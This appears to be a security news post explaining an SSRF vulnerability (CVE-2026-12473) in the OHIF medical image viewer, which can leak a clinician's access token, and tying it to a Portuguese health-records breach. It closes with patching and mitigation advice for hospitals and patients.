‹ ARCHIVE NB-L065 · .log · 2026·07

All it took was a doctor's click to hand over the key to your medical scans

All it took was a doctor's click to hand over the key to your medical scans
NB-L065 .log

A flaw in one of the most widely used programs for viewing medical images lets an attacker steal, with a single link, the access key of the doctor looking at your scans. No one has to break into the hospital or crack a password, a logged-in clinician just has to click in the wrong place.

The program is called OHIF, an open-source medical image viewer that hospitals, clinics, and research centers use to open X-rays, CT scans, and MRIs in the browser. It is free, it is the reference tool in its field, and it is the base for commercial products. It is also, now, a clean example of an uncomfortable truth: in healthcare, the crown jewel is not your medical record, it is the credential of whoever can reach it.

Whoever steals the right login does not need to break in, they walk through the front door wearing the uniform of someone who already works there. In Portugal, this has stopped being hypothetical.

How one click hands over the key

The flaw has a code name, CVE-2026-12473, and a severity of 8.2 out of 10 on the scale used to rank vulnerabilities. It is an SSRF, a flaw that tricks the system itself into fetching content from an address the attacker chooses. In OHIF, two data sources shipped in the default configuration accept any address without validating it, and there is a twist that makes it worse: the system, trying to be helpful, automatically grabs the doctor's token, the temporary key that proves he is logged in, and sends it along with the request. If that request ends up on the attacker's server, the key goes with it, and a stranger gets to see what the doctor sees, the patients' images and the archive where they are stored.

The flaw affects versions up to 3.12.0 and was fixed in 3.12.2, released on May 18. According to CISA, the United States cybersecurity agency that issued the alert on June 25, there are no signs yet that it is being exploited. That makes now the right time to close the hole, before someone finds it.

Portugal has already seen what comes next

Because when someone finds it, we already know how it ends. In May, Portugal's Judicial Police investigated the improper access to the health records of more than 100,000 users of the national health service, adults and children, from across the country. The way in was not a software flaw, it was the abuse of a doctor's credentials by third parties. The Judicial Police said publicly that the volume pulled in such a short time points to the use of artificial intelligence, a haul that "a few months ago would have taken three months." These are different cases, but the lesson is the same: when a clinician's key falls into the wrong hands, the damage is measured in hundreds of thousands of people.

This is where the OHIF flaw matters more than its score suggests. We treat the image viewer as harmless plumbing, a window for looking at files, but that window holds the master key. A health system is only as secure as the most distracted link in its chain, and that link is usually an overworked professional clicking a link between two appointments. Serious defense is not asking him never to slip, it is designing systems that assume he will.

How to close the door

For those who run health systems:

  • Update OHIF to version 3.12.2 without waiting for the next maintenance window.
  • Remove the default data sources you do not use and restrict the addresses the system is allowed to fetch content from.
  • Require phishing-resistant authentication, so a stolen key is not enough, on its own, to get in.
  • Log and watch access: 100,000 records pulled in days should have tripped an alarm.

On the other side of the appointment, your side:

  • You have the right to know whether your data was accessed, and to ask. The law protects health information above almost everything else.
  • Be wary of messages asking you to click "to see a result" or "confirm your identity," even when they look like they come from a health service.

The image of your scan may be perfectly safe. The question that matters is a different one: who holds the key, and how many clicks separate it from a stranger.

Sources: CISA, HIPAA Journal, Renascença.

#StaySafe
🙏🖖

DOMAIN
BRI assistant

Quer saber sobre um projeto, um serviço ou uma notícia recente? Pergunte. Conheço todo o conteúdo deste site.